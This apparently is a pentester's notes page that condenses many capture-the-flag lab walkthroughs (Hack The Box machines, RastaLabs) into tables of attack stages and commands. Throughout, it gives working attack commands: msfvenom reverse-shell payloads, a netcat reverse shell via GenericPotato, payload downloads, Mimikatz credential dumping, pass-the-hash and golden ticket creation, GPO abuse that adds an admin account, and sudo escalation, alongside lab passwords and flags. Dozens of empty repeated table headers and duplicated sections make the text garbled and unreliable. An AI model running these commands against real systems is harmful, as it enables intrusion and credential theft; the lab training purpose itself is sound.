Network Scenarios
Last updated
Last updated
LLMNR Poisoning->AS-REP Roast->ForceChangePassword->GenericWrite->Password Spraying->RunForrestRun.exe->RunForrestRun.exe->Abusing Vulnerable GPO->Abusing MSSQL Service Database->Abusing Domain Trusts
Service Permission->ForceChangePassword->Abuse ACLs->Abuse SQL Instance->Abuse Service->pass the ticket->golden ticket
always elevated->constrained delegation->unconstrained delegation print bug->cross trust->Abuse MSSQL Service
Bypass AMSI->always elevated->constrained delegation->Pass the ticket->Abuse SQL Instance->Abuse GPO->DSync Attack
| ID | Stage | Techniques | Commands |
|---|---|---|---|
Reconnaissance:
Techniques: Port scanning with Nmap, adding domain names to the /etc/hosts file.
Commands: nmap -sC -sV -oA /result 10.10.10.217, cat nmap/result.nmap.
Enumeration:
Techniques: Using Gobuster to find directories, dumping .git directory with GitTools.
Commands: gobuster dir -u http://cereal.htb -w wordlist, bash gitdumper.sh http://source.cereal.htb/.git/ /root/Desktop/HTB/Cereal/dump/.
Exploitation:
Techniques: Exploiting Cross-site Scripting (XSS) to trigger deserialization, creating JWT tokens, uploading a shell.
Commands: python3 jwt_tool.py -b -S hs256 -p 'secret', bash extractor.sh ../../dump/ /root/Desktop/HTB/Cereal/all_dump/.
Gaining Access:
Techniques: Uploading and executing a shell, using Python scripts to automate tasks.
Commands: python3 -m http.server 80, nc -nvlp 9001, python3 dedsec.py, curl -k https://source.cereal.htb/uploads/shell.aspx.
Privilege Escalation:
Techniques: Port forwarding, exploiting SEImpersonation privilege with JuicyPotato, using GraphQL for SSRF.
Commands: msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.6 LPORT=9003 -f exe -o ded.exe, curl http://10.10.14.6/ded.exe -o C:\\temp\\ded.exe, nc -nvlp 1337.
Post-Exploitation:
Techniques: Maintaining access, executing reverse shells.
Commands: .\\GenericPotato.exe -p "C:\\temp\\nc64.exe" -a "10.10.14.6 1337 -e powershell" -e HTTP -l 8889.
| ID | Stage | Techniques | Commands |
|---|---|---|---|
| ID | Stage | Techniques | Commands |
|---|---|---|---|
| ID | Stage | Techniques | Commands |
|---|---|---|---|
| ID | Stage | Techniques | Commands |
|---|---|---|---|
| ID | Stage | Techniques | Commands |
|---|---|---|---|
| ID | Stage | Techniques | Commands |
|---|---|---|---|
| ID | Stage | Techniques | Commands |
|---|---|---|---|
| ID | Stage | Techniques | Commands |
|---|---|---|---|
| ID | Stage | Techniques | Commands |
|---|---|---|---|
| ID | Stage | Techniques | Commands |
|---|---|---|---|
| ID | Stage | Techniques | Commands |
|---|---|---|---|
| ID | Stage | Techniques | Commands |
|---|---|---|---|
| ID | Stage | Techniques | Commands |
|---|---|---|---|
| ID | Stage | Techniques | Commands |
|---|---|---|---|
| ID | Stage | Techniques | Commands |
|---|---|---|---|
| ID | Stage | Techniques | Commands |
|---|---|---|---|
| ID | Stage | Techniques | Commands |
|---|---|---|---|
| ID | Stage | Techniques | Commands |
|---|---|---|---|
| ID | Stage | Techniques | Commands |
|---|---|---|---|
| ID | Stage | Techniques | Commands |
|---|---|---|---|
| ID | Stage | Techniques | Commands |
|---|---|---|---|
| ID | Stage | Techniques | Commands |
|---|---|---|---|
| ID | Stage | Techniques | Commands |
|---|---|---|---|
| ID | Stage | Techniques | Commands |
|---|---|---|---|
| ID | Stage | Techniques | Commands |
|---|---|---|---|
| ID | Stage | Techniques | Commands |
|---|---|---|---|
| ID | Stage | Techniques | Commands |
|---|---|---|---|
| ID | Stage | Techniques | Commands |
|---|---|---|---|
| ID | Stage | Techniques | Commands |
|---|---|---|---|
| ID | Stage | Techniques | Commands |
|---|---|---|---|
| ID | Stage | Techniques | Commands |
|---|---|---|---|
| ID | Stage | Techniques | Commands |
|---|---|---|---|
| ID | Stage | Techniques | Commands |
|---|---|---|---|
| ID | Stage | Techniques | Commands |
|---|---|---|---|
| ID | Stage | Techniques | Commands |
|---|---|---|---|
| ID | Stage | Techniques | Commands |
|---|---|---|---|
| ID | Stage | Techniques | Commands |
|---|---|---|---|
| ID | Stage | Techniques | Commands |
|---|---|---|---|
| ID | Stage | Techniques | Commands |
|---|---|---|---|
| ID | Stage | Techniques | Commands |
|---|---|---|---|
| ID | Stage | Techniques | Commands |
|---|---|---|---|
| ID | Stage | Techniques | Commands |
|---|---|---|---|
| ID | Stage | Techniques | Commands |
|---|---|---|---|
| id | stage | techniques | commands |
|---|---|---|---|
| id | stage | techniques | commands |
|---|---|---|---|
| id | stage | techniques | commands |
|---|---|---|---|
| id | stage | techniques | commands |
|---|---|---|---|
| ID | Stage | Techniques | Commands |
|---|---|---|---|
| ID | Stage | Techniques | Commands |
|---|---|---|---|
| ID | Stage | Techniques | Commands |
|---|---|---|---|
| ID | Stage | Techniques | Commands |
|---|---|---|---|
| ID | Stage | Techniques | Command |
|---|---|---|---|
| ID | Stage | Techniques | Command |
|---|---|---|---|
| ID | Stage | Techniques | Command |
|---|---|---|---|
| ID | Stage | Techniques | Command |
|---|---|---|---|
| ID | Stage | Techniques | Command |
|---|---|---|---|
| id | stage | techniques | commands |
|---|---|---|---|
| id | stage | techniques | command |
|---|---|---|---|
| id | stage | techniques | command |
|---|---|---|---|
1
Enumeration
Online search for lab IP range
N/A
2
Enumeration
Port scanning with masscan
masscan -p 80,135,139,445,443 -sT 10.10.110.0/24 -e tun0
3
Enumeration
Detailed host scanning with nmap
nmap (specific commands not provided)
4
Enumeration
Finding domain names with crackmapexec
crackmapexec (specific commands not provided)
1
Recon
Nmap scanning
nmap -sC -sV -oA nmap/result 10.10.10.210
2
Enumeration
Gobuster directory scanning
gobuster dir -u https://10.10.10.210 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -k -t 50
3
Credential Harvesting
Gathering usernames
Gather usernames manually and create a user.txt file
4
Credential Harvesting
Password spraying
python3 atomizer.py owa 10.10.10.210 pass.txt user.txt -i 0:0:01
5
Phishing
Sending phishing emails
Use Outlook to send phishing emails and capture NTLMv2 hash with Responder
6
Hash Cracking
Cracking NTLMv2 hash
hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt --force
7
Access
PowerShell remote session
$offsec_session = New-PSSession -ComputerName 10.10.10.210 -Authentication Negotiate -Credential k.svensson
8
Privilege Escalation
Creating a Symlink
New-Item -ItemType Junction -Path 'C:\\ProgramData\\root' -Target 'C:\\Users\\Administrator'
9
Privilege Escalation
Using Check-File command
Check-File C:\\programdata\\root\\Desktop\\root.txt
10
Exfiltration
Transferring files with nc.exe
iwr -uri http://10.10.xx.xx/nc.exe -o 'C:\\Windows\\System32\\spool\\drivers\\color\\nc.exe'
1
Recon
Nmap scanning
nmap -sC -sV -oA nmap/result 10.10.10.211
2
Web Enumeration
Checking server with Wappalyzer
Use Wappalyzer to identify backend technologies
3
Web Enumeration
Analyzing .git directory
Check the Gemfile in the .git directory for Ruby and Gem versions
4
Exploitation
Exploiting Ruby on Rails
Use a Ruby on Rails exploit
5
Post-Exploitation
Capturing request in Burp
Capture the request and modify it with the exploit
6
Post-Exploitation
Getting a reverse shell
Use netcat listener and send the exploit to get a reverse shell
7
Privilege Escalation
Cracking password hashes
Use John the Ripper to crack password hashes found in /var/backups
8
Privilege Escalation
Using .google_authenticator file
Use the contents of .google_authenticator to bypass two-factor authentication
9
Privilege Escalation
Synchronizing time for successful exploit
Adjust the system time to match the timezone for the exploit to work
10
Privilege Escalation
Gaining root access with GTFOBins
sudo gem open -e "/bin/sh -c /bin/sh" rdoc to gain root access
1
Recon
Nmap scanning
nmap -sV -sC -oN nmap 10.10.10.237
2
File Analysis
Analyzing executable file
file heedv1\\ Setup\\ 1.0.0.exe
3
SMB Enumeration
Enumerating SMB shares
smbclient -L \\\\10.10.10.237
4
SMB File Transfer
Transferring files via SMB
smbclient \\\\\\\\10.10.10.237\\Software_Updates then get UAT_Testing_Procedures.pdf
5
Exploitation
Crafting malicious binary
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.30 LPORT=9001 -f exe -o "r'sp00f.exe"
6
YML File Creation
Creating a .yml file for the exploit
Manual creation of latest.yml file
7
SMB File Transfer
Uploading .yml file via SMB
smbclient \\\\\\\\10.10.10.237\\Software_Updates then put latest.yml
8
Reverse Shell
Obtaining a reverse shell
Use Metasploit to listen for the reverse shell
9
Redis Exploitation
Exploiting Redis
redis-cli -h 10.10.10.237 then get pk:urn:user:e8e29158-d70d-44b1-a1ba-4949d52790a0
10
Password Decryption
Decrypting password
python3 decrypt.py with the script provided in the summary
1
Data Analysis
Reading pcap file
Use NetworkMiner to read the .dmp file and extract the secret file
2
Cryptography
Decoding the flag
Use filecryptopgraphy.psm1 PowerShell module
3
File Preparation
Preparing files for decryption
Rename the secret file to secret.txt.AES on ws04
4
Key Conversion
Converting key for decryption
`$key = Get-Content key.txt
5
File Decryption
Decrypting the file
Unprotect-File '.\\secret.txt.AES' -Algorithm AES -Key $key
6
Flag Retrieval
Retrieving the flag
The flag is RASTA{cryp70_3xf1l7r4710n}
1
Credential Dumping
Enumerating credentials on WS02
Get-ChildItem C:\Users\epugh\AppData\Local\Microsoft\Credentials\ -force
2
Credential Dumping
Using Mimikatz to dump creds
Upload mimikatz.exe and execute sekurlsa::dpapi to get the master key
3
Credential Decryption
Decrypting credentials
dpapi::cred /in:C:\users\epugh\AppData\Local\Microsoft\Credentials\936A68B5AC87C545C4A22D1AF264C8E9 /masterkey:40fc84...
4
Port Forwarding
Setting up port forwarding
portfwd add -L 10.10.14.83 -r 10.10.122.15 -l 3389 -p 3389
5
RDP Connection
Connecting via RDP with Remmina
Install Remmina, import sql01.rdp, change host, export to .rdp file
6
RDP Connection
Using xfreerdp to connect
xfreerdp sql.rdp /u:epugh_adm /d:rastalabs.local
7
Flag Retrieval
Retrieving the flag
The flag is RASTA{c00k1n6_w17h_645_n0w}
1
Credential Enumeration
Finding LAPS group members
Enumeration to find ngodfrey_adm is part of LAPS group on WS05
2
Credential Access
Dumping credentials with PowerSploit
powershell -ep bypass then Import-module ./PowerSploit.psd1
3
Credential Access
Using credentials for access
$SecPassword = ConvertTo-SecureString 'J5KCwKruINyCJBKd1dZU' -AsPlainText -Force then $cred = New-Object System.Management.Automation.PSCredential('rastalabs.local\\ngodfrey_adm', $SecPassword)
4
Credential Access
Getting AD object with credentials
Get-ADObject -Name web01 -DomainController 10.10.120.1 -Credential $Cred
5
Local Admin Passwords
Retrieving local admin passwords
Passwords are listed for WS01, WS02, WS03, WS04, WS05
6
Port Forwarding
Setting up port forwarding with Meterpreter
portfwd add -L 10.10.14.83 -r 10.10.121.101 -l 447 -p 445 and similar for other ports
7
Exploitation
Using MS17-010 exploit for admin shell
exploit/windows/smb/ms17_010_psexec with lport 80, 443, 8080
8
Flag Retrieval
Retrieving flags from WS02 and WS04
Flags are RASTA{3v3ryb0dy_l0v35_l4p5}, RASTA{wh3r3_w45_2f4_!?}, RASTA{50m371m35_y0u_mu57_b4ck7r4ck}
9
Post-Exploitation
Running Mimikatz on WS02
privilege::debug then sekurlsa::logonPasswords
10
File Permissions
Modifying file permissions for flag
icacls flag.txt /grant administrator:F or icacls flag.txt /grant RLAB\\ahope:F
1
Privilege Escalation
AS-REP Roasting
Import-module ./asreproast.ps1
Invoke-ASREPRoast -Domain rastalabs.local -Server 10.10.120.1
Invoke-ASREPRoast -Domain rastalabs.local -Server 10.10.120.1 | select -expand hash
2
Hash Extraction
Saving Hash
Copy the hash to a txt file and save it with UTF-8 encoding
3
Wordlist Creation
Using kwprocessor
./kwp -z basechars/full.base keymaps/en-us.keymap routes/2-to-16-max-3-direction-changes.route > kwp3.txt
4
Password Cracking
Using John the Ripper
Use John the Ripper (jumbo version) to crack the hash
5
Credential Use
User Enumeration
net use H: \\\\fs01.rastalabs.local\\home$\\ngodfrey /user:ngodfrey "zaq123$%^&*()_+"
6
Flag Retrieval
Accessing Flag
The flag is RASTA{k3rb3r05_15_7r1cky}
1
Enumeration
Viewing shares on fs01
net view \\fs01 /all
2
Enumeration
Using PowerSploit for enumeration
powershell -ep bypass
Import-module ./PowerSploit.psd1
Get-NetShare \\fs01
3
Flag Retrieval
Accessing open shares
Flag is RASTA{ju1cy_1nf0_1n_0p3n_5h4r35}
1
Phishing
Creating phishing HTA
python unicorn.py windows/meterpreter/reverse_https 10.10.14.83 443 hta
2
Web Server Setup
Hosting HTA on Apache2
copy index.html launcher.hta /var/www/html
service apache2 start
3
Listener Setup
Setting up Metasploit listener
msfconsole -r unicorn.rc
4
Share Enumeration
Viewing shares on the network
net share
net view
net use K: \\\\hostname\\share$
net view \\\\hostname /all
5
User Enumeration
Displaying domain user accounts
net user /domain
6
User Information
Viewing user info
net user [username] /domain
7
Group Enumeration
Viewing domain group members
net group finance /domain
8
Drive Enumeration
Listing logical drives
fsutil fsinfo drives
wmic logicaldisk get name
diskpart > list volume
9
Network Recon
Pinging servers for IP addresses
ping DC01
ping FS01
ping MX01
ping NIX01
ping SQL01
ping WS01
ping WS02
ping WS03
ping WS05
10
Flag Retrieval
Accessing the flag
Flag is RASTA{w007_f007h0ld_l375_pwn}
11
KeePass Database
Found KeePass database and key file
Located in M:\\Documents
1
User Enumeration
Finding user directory on fs01
net user ahope /domain
2
Network Drive Mount
Mounting network drive to access file
net use Q: \\fs01.rastalabs.local\home$\ahope /user:ahope "Labrador8209"
3
File Conversion
Converting .ppk to OpenSSH format
puttygen nix01.ppk -O private-openssh -o nix
4
Network Configuration
Adding route and running proxy server
Commands for adding route and running socks4a proxy server on ws01 not provided in summary
5
SSH Connection
Connecting via SSH with proxychains
proxychains ssh -i nix ahope@10.10.122.20
6
Privilege Escalation
Using exploit for privilege escalation
Compile exploit with gcc exp1.c -o exploit
7
File Transfer
Transferring exploit to target
proxychains scp -i nix -r exploit ahope@10.10.122.20:/home/ahope
8
File Download
Downloading file from remote to local
proxychains scp -i nix ahope@10.10.122.20:/usr/local/sbin/paycalc /root/Desktop/rasta
9
Flag Retrieval
Retrieving the flag
Flag is RASTA{y0ur3_4_b4ll3r_70_637_7h15}
1
Port Forwarding
Forwarding port to ws01
portfwd add -L 10.10.14.83 -r 10.10.121.100 -l 445 -p 445
2
Remote Execution
Using Metasploit psexec for shell
Use msf psexec to get a shell on ws01
3
Remote Execution
Using Impacket psexec for shell
Use Impacket psexec to get a shell on ws01, add route in meterpreter
4
Proxy Configuration
Setting SOCKS4a proxy in Metasploit
Set socks4a proxy in msf, then edit /etc/proxychains.conf
5
Enumeration
Using CrackMapExec to enumerate
proxychains crackmapexec 10.10.120.1 -u rweston_da -H <hash> --ntds drsuapi
6
Hash Dumping
Dumping hashes
Dump hashes with CrackMapExec and proxychains
7
Credential Access
Accessing vault with Mimikatz
Use Mimikatz on ws01 to access vault credentials
8
Credential Decryption
Decrypting credentials
dpapi::cred /in:C:\users\rweston\AppData\Local\Microsoft\Credentials\<hash> /masterkey:<masterkey>
9
Impersonation
Impersonating user with Incognito
In meterpreter, load incognito and impersonate rweston
10
Clipboard Monitoring
Monitoring clipboard for credentials
Transfer shell to Empire and monitor clipboard
11
RDP Connection
Connecting via RDP with credentials
xfreerdp /u:epugh_adm /p:IReallyH8LongPasswords! /v:10.10.110.10
12
Flag Retrieval
Retrieving the flag
Flag is RASTA{c4r3ful_h0w_y0u_h4ndl3_cr3d5}
1
Port Forwarding
Forwarding port to ws05
portfwd add -L 10.10.14.83 -r 10.10.123.102 -l 445 -p 445
2
Credential Use
Using rweston_da hash
rweston_da hash --- ab7b75ff84475be2e8c4dcb7390955c3:3ff61fa259deee15e4042159d7b832fa
3
Exploitation
Exploit via smb/psexec
Use the hash with smb/psexec to exploit
4
Flag Retrieval
Retrieving the flag
Flag is RASTA{53rv1c3_4bu53_f7w}
1
Credential Use
Using epugh_adm credentials
Log in to web01 (10.10.110.10) and then RDP to sql01 (10.10.122.15) using epugh_adm creds
2
Lateral Movement
RDP to fs01 with gopikrishna
RDP to fs01 with user gopikrishna [local admin]
3
Malware Execution
Running p0wnedshell.exe
Run p0wnedshell.exe with admin cmd
4
Credential Dumping
Invoke Mimikatz from p0wnedshell
Use option 4 in p0wnedshell, invoke Mimikatz to get rweston_da NTLM hash
5
Credential Use
Pass-the-hash with Mimikatz
sekurlsa::pth /user:rweston_da /domain:rastalabs.local /ntlm:3ff61fa259deee15e4042159d7b832fa
6
Golden Ticket Attack
Perform DCSync to get krbtgt hash
Use option 10 in p0wnedshell, perform DCSync
7
Golden Ticket Attack
Generate golden ticket
kerberos::golden /domain:rastalabs.local /user:rweston_da /sid:S-1-5-21-1396373213-2872852198-2033860859 /krbtgt:1b6e14bc52b67a2357f7938a8bbceb1b /ticket:C:\\Users\\GOPIKR~1\\Desktop\\rweston_da.ticket
8
Golden Ticket Attack
Use golden ticket
kerberos::ptt C:\\Users\\GOPIKR~1\\Desktop\\rweston_da.ticket
9
Flag Retrieval
Accessing the flag
pushd \\\\dc01.rastalabs.local\\C$
Flag is RASTA{r4574l4b5_ch4mp10n}
1
Initial Access
Using epugh_adm credentials
Log in to web01 (10.10.110.10)
2
Lateral Movement
RDP to sql01 with epugh_adm creds
Take RDP of sql01 (10.10.122.15) using epugh_adm credentials
3
Database Access
Start SQL Management Studio
Start SQL Management Studio and connect via Windows authentication
4
Database Querying
Querying SQL database
use umbraco;
SELECT TABLE_NAME FROM umbraco.INFORMATION_SCHEMA.TABLES WHERE TABLE_TYPE = 'BASE TABLE'
5
Flag Retrieval
Retrieving the flag from database
select * from Flag
Flag is RASTA{d474b4535_4r3_u5u4lly_1n73r3571n6}
1
Credential Use
Logging in with epugh_adm credentials
mstsc /v:web01 /u:epugh_adm /p:[password]
2
Lateral Movement
RDP to sql01 using epugh_adm
mstsc /v:sql01 /u:epugh_adm /p:[password]
3
GPO Enumeration
Enumerating GPO permissions
`Get-NetGPO
4
Group Membership
Checking group members
net user epugh_adm /domain
5
GPO Permission
Finding GPO with weak permissions
`Get-NetGPO -ComputerName fs01.rastalabs.local
6
OU Enumeration
Finding host with specific policy
`Get-NetOU -GUID "{DCE628BF-341C-4503-8181-3B8865700F6A}"
7
Policy Enumeration
Identifying applied policy
`Get-NetGPO -ComputerName fs01.rastalabs.local
8
GPO Abuse
Creating and applying immediate tasks
New-GPOImmediateTask -TaskName gop12i -GPODisplayName "Test GPO" -CommandArguments 'net user gopikrishna Ramco@12345 /add' -force
New-GPOImmediateTask -TaskName gopi131 -GPODisplayName "Test GPO" -CommandArguments 'net localgroup Administrators gopikrishna /add' -force
9
File Permissions
Modifying permissions for flag.txt
icacls flag.txt /grant administrators:F
10
Flag Retrieval
Retrieving the flag
Flag is RASTA{6p0_4bu53_15_h4rdc0r3}
1
Initial Recon
Nmap scan
nmap -sC -sV 10.10.10.197
2
DNS Enumeration
Brute-force subdomains
ffuf -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://sneakycorp.htb/ -H "Host: FUZZ.sneakycorp.htb" -fs 185
3
Email Gathering
Extract emails
Extract emails from http://sneakycorp.htb/team.php to mails.txt
4
Phishing
Send phishing emails
Use swaks to send emails to addresses in mails.txt
5
Credential Harvesting
Decode credentials
Use Burp Suite to decode credentials from intercepted traffic
6
Email Client Setup
Configure email client
Set up evolution with SMTP server and paulbyrd@sneakymailer.htb credentials
7
FTP Access
Access FTP
ftp 10.10.10.197 with credentials obtained
8
Reverse Shell
Upload and trigger reverse shell
Upload rev.php via FTP and trigger with curl
9
Privilege Escalation
Add SSH key to authorized keys
Add generated SSH key to /home/low/.ssh/authorized_keys via malicious package
10
Sudo Exploitation
Exploit sudo permissions
Use sudo /usr/bin/pip3 to execute a malicious package with a reverse shell
1
Port Scanning
Masscan and Nmap
masscan -p1-65535,U:1-65535 10.10.10.162 --rate=1000 -e tun0
nmap [options] [target]
2
Web Enumeration
Checking web ports
Access web service on ports 80 and 443
3
SSL Certificate
Viewing certificate
View SSL certificate details
4
Host File Editing
Adding VHOST to hosts file
Edit /etc/hosts to add staging-order.mango.htb
5
NoSQL Injection
Bypassing login
Use Burp Suite to intercept and modify request for NoSQL injection
6
Data Extraction
Automating credential extraction
Run Python script to extract credentials for admin and mango users
7
SSH Connection
Accessing SSH
SSH into the server using extracted credentials
8
User Flag Access
Retrieving user flag
Use su to login as admin and retrieve user flag
9
Privilege Escalation
Exploiting SUID file
Use SUID file to read root flag or exploit for root access
10
Root Flag Access
Reading root flag
Run binary or use jjs to read root flag
1
Reconnaissance
Nmap scan
nmap -sC -sV -oA nmap/result 10.10.10.214
2
Web Vulnerability Scan
Checking for JSON vulnerabilities
Use JSON Beautifier and Validator on http://10.10.10.214
3
Exploitation
Exploiting CVE-2019-12384 in fasterxml
Create dedsec.sql with payload and serve it with Python HTTP server
4
Initial Access
Gaining a shell as user pericles
Input crafted JSON to trigger the exploit and gain a shell
5
Privilege Escalation
Using timer_backup.sh for privilege escalation
Add your SSH public key to /root/.ssh/authorized_keys via timer_backup.sh
6
Alternative Privilege Escalation
Escalating privileges without SSH key
Use timer_backup.sh to add SUID bit to /bin/bash and open a root shell
7
Flag Capture
Capturing user and root flags
Use the gained shell to capture user.txt and root.txt
1
Reconnaissance
Nmap scan
nmap -sC -sV -oA nmap/result 10.10.10.194
2
Web Enumeration
Checking for JSON vulnerabilities
Use JSON Beautifier and Validator on http://10.10.10.214
3
Exploitation
Exploiting CVE-2019-12384 in fasterxml
Create dedsec.sql with payload and serve it with Python HTTP server
4
Initial Access
Gaining a shell as user pericles
Input crafted JSON to trigger the exploit and gain a shell
5
Privilege Escalation
Using timer_backup.sh for privilege escalation
Add your SSH public key to /root/.ssh/authorized_keys via timer_backup.sh
6
Alternative Privilege Escalation
Escalating privileges without SSH key
Use timer_backup.sh to add SUID bit to /bin/bash and open a root shell
7
Flag Capture
Capturing user and root flags
Use the gained shell to capture user.txt and root.txt
1
Reconnaissance
Nmap scan
nmap -sC -sV -oA nmap/result 10.10.10.186
2
Web Enumeration
Dirbuster scan
dirbuster
3
QUIC Protocol Access
Accessing HTTP/3 Protocol
cargo run --manifest-path=tools/apps/Cargo.toml --bin quiche-client -- --no-verify https://quick.htb/
1
Reconnaissance
Nmap scan
nmap -T4 -p- -oA forwardslash.scan forwardslash.htb
2
Subdomain Enumeration
WFUZZ fuzzing
Use WFUZZ with common wordlists to find subdomains
3
Directory Enumeration
GoBuster scanning
Use GoBuster to enumerate directories
4
LFI Vulnerability
Exploiting Local File Inclusion
Use Burp Suite to exploit LFI and directory traversal
5
Database Credential Access
Obtaining credentials via LFI
Use LFI to read var/www/backup.forwardslash.htb/config.php for database credentials
6
API Exploitation
Using php://filter wrapper
Exploit API with php://filter/convert.base64_encode/resource to read files
7
FTP Credential Access
Decoding Base64 for credentials
Decode Base64 to find FTP credentials
8
SSH Access
Using FTP credentials for SSH
Use FTP credentials to access SSH
9
User Flag Acquisition
Enumerating user directories
Find and read user.txt in user's directory
1
Reconnaissance
Nmap Scanning
nmap -p- -A -T4 poo.htb
2
Directory Enumeration
Fuzzing with WFUZZ
wfuzz --hc 404 -w /usr/share/seclists/Discovery/Web-Content/SVNDigger/all.txt http://poo.htb/FUZZ
3
Exploitation
Exploiting .DS_Store File
Use ds_store_exp tool to extract information from the .DS_Store file
1
Initial Recon
Nmap Scanning
nmap -p 1-16000 dyplesher.htb
2
Web Enumeration
WFUZZ Directory Discovery
wfuzz -u http://test.dyplesher.htb/FUZZ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-medium-files-lowercase.txt
3
Git Repository Cloning
Using GitDumper
./gitdumper.sh http://test.dyplesher.htb/.git/ test.dyplesher
4
Memcached Credential Access
Using memcached-cli to retrieve credentials
memcached-cli felamos:zxcvbnm@dyplesher.htb:11211
5
Password Cracking
Using John the Ripper
Use John the Ripper with retrieved hashes
6
Gogs Service Access
Logging into Gogs with cracked credentials
Log into Gogs service at port 3000
7
Git Bundle Analysis
Unpacking Git Bundles
Move .bundle files to 'Bundle-Unpack' directory and use Git Clone to unpack
1
Initial Recon
Nmap Scanning
nmap -p 1-16000 dyplesher.htb
2
Web Enumeration
WFUZZ Directory Discovery
wfuzz -u http://test.dyplesher.htb/FUZZ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-medium-files-lowercase.txt
3
Cloning Exposed Repository
Using GitDumper
./gitdumper.sh http://test.dyplesher.htb/.git/ test.dyplesher
4
Memcached Credential Access
Using memcached-cli
memcached-cli felamos:zxcvbnm@dyplesher.htb:11211
5
Cracking Hashes
Using John the Ripper
Use John the Ripper with retrieved hashes
6
Gogs Service Access
Logging into Gogs
Log into Gogs service at port 3000
7
Git Bundle Analysis
Unpacking Git Bundles
Move .bundle files to 'Bundle-Unpack' directory and use Git Clone to unpack
1
Initial Recon
Nmap Scanning
nmap -sV -p- -oA cascade.nmap cascade.htb
2
User Enumeration
Enum4Linux
enum4linux -a cascade.htb
3
LDAP Enumeration
Impacket LDAPSearch
impacket-ldapsearch -u 'r.thompson' -p 'rY4n5eva'
4
SMB Enumeration
Accessing SMB Shares
smbclient //cascade.htb/IT -U r.thompson
5
Log Analysis
Reviewing Service Logs
cat ArkAdRecycleBin.log
6
Registry Analysis
Downloading and Analyzing Registry
get VNC Install.reg; cat VNC Install.reg
7
Password Decryption
Decrypting VNC Passwords
Use online HEX decoder or VNC password decryption tool
8
Remote Access
Using Evil-WinRM
evil-winrm -i cascade.htb -u s.smith -p 'decrypted_password'
9
Share Enumeration
Listing SMB Shares
smbclient //cascade.htb/Audit$ -U s.smith
10
Database Analysis
Analyzing SQLite Database
Open Audit.db with a database viewer like EditPlus
1
Initial Recon
Nmap Scanning
nmap -sV -p- -oA blunder.nmap blunder.htb
2
Web Enumeration
Fuzzing with Extensions
wfuzz -u http://blunder.htb/FUZZ -w list.txt -t 50 --hw 0
3
Exploit Identification
Searchsploit
searchsploit bludit
4
Brute Force Attack
Using Custom Script
Custom Python script for brute-forcing
5
Exploitation
Metasploit Framework
msfconsole and use exploit for Bludit CMS
6
Shell Stabilization
Python TTY Spawn
python3 -c 'import pty; pty.spawn("/bin/bash")'
7
User Privilege Discovery
Checking Sudo Permissions
sudo -l
8
Privilege Escalation
Exploiting Sudo Bug CVE-2019-14287
sudo -u#-1 /bin/bash
1
Initial Recon
Nmap Scanning
nmap -sC -sV 10.10.10.203
2
SVN Enumeration
SVN Commands
svn help, svn list svn://10.10.10.203
3
Sub-Domain Discovery
Adding Sub-Domains to Hosts
Edit /etc/hosts and add sub-domains
4
SVN Log Analysis
Viewing SVN Logs
svn log svn://10.10.10.203/
5
SVN Diff Analysis
Viewing SVN Diffs
svn diff -c r2 svn://10.10.10.203
6
Azure DevOps Access
Logging into Azure DevOps
Use credentials to log into devops.worker.htb
7
Malicious File Upload
Creating and Uploading ASPX File
msfvenom to create payload.aspx and upload via pull request
8
Meterpreter Shell
Getting Reverse Shell
Set up listener with msfconsole and navigate to lens.worker.htb/payload.aspx
9
Post-Exploitation
Meterpreter Commands
getuid, sysinfo, cd /users, dir in meterpreter shell
1
Reconnaissance
Nmap Scanning
nmap -sC -sV 10.10.10.95
2
Access Tomcat
Default Credentials
Use default credentials tomcat:s3cret to access Apache Tomcat Manager
3
Deploy WAR
MsfVenom WAR File Creation
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.17 LPORT=4444 -f war > reverse_shell
4
Gain Shell
Netcat Listener
nc -lvnp 4444 then access the deployed WAR file to get a shell
5
Privilege Check
Whoami Command
whoami to check the current user privileges
6
Flag Acquisition
Directory Navigation and Reading
Navigate to C:\Users\Administrator\Desktop\flags and read 2 for the price of 1.txt
1
Initial Enumeration
Nmap Scanning
nmap -sC -sV -oN nmap/ 10.10.10.187
2
Accessing FTP
Using Found Credentials
Use ftpuser credentials found in credentials.txt
3
Exploring Web Server
Checking robots.txt
Access http://10.10.10.187/robots.txt to find disallowed entries
4
Downloading Files
Using FTP to Download Files
Download html.tar.gz and dump.sql from the server
5
Code Analysis
Reviewing PHP Scripts
Analyze db_admin.php and admin_tasks.php for potential credentials and functions
6
SSH Access
Using Credentials for SSH
Use waldo credentials to access SSH
7
Privilege Escalation
Analyzing Sudo Permissions
Run sudo -l to check for allowed commands for waldo
8
Exploiting Scripts
Using admin_tasks.sh for Privilege Escalation
Exploit the SETENV option in sudo to run admin_tasks.sh as root
9
Gaining Root
Python Path Hijacking
Use PYTHONPATH hijacking to get a root shell
1
Initial Enumeration
Nmap Scanning
nmap -sC -sV -oN nmap/ 10.10.10.187
2
Accessing FTP
Using Found Credentials
Use ftpuser credentials found in credentials.txt
3
Exploring Web Server
Checking robots.txt
Access http://10.10.10.187/robots.txt to find disallowed entries
4
Downloading Files
Using FTP to Download Files
Download html.tar.gz and dump.sql from the server
5
Code Analysis
Reviewing PHP Scripts
Analyze db_admin.php and admin_tasks.php for potential credentials and functions
6
SSH Access
Using Credentials for SSH
Use waldo credentials to access SSH
7
Privilege Escalation
Analyzing Sudo Permissions
Run sudo -l to check for allowed commands for waldo
8
Exploiting Scripts
Using admin_tasks.sh for Privilege Escalation
Exploit the SETENV option in sudo to run admin_tasks.sh as root
9
Gaining Root
Python Path Hijacking
Use PYTHONPATH hijacking to get a root shell
1
Initial Enumeration
Nmap Scanning
nmap -sC -sV -p- 10.10.10.200 -v --min-rate=10000
2
Accessing Rsync
Listing Rsync Modules
nc -vn 10.10.10.200 873 followed by list
3
Downloading Backups
Using Rsync to Download Files
rsync -av rsync://10.10.10.200/conf_backups files
4
Decrypting Backups
Decrypting EncFS
python encfs2john.py /root/hackthebox/machine/unbalanced/files/ > hash
john --wordlist=/usr/share/wordlists/rockyou.txt --progress-every=3 hash
5
Reading Files
Accessing Decrypted Configuration
encfsctl export files decrypt
Files
ls decrypt/ to view the decrypted files
1
Information Gathering
Nmap Scanning
nmap -sV -sC -v -p- --min-rate=10000 10.10.10.197
2
Subdomain Enumeration
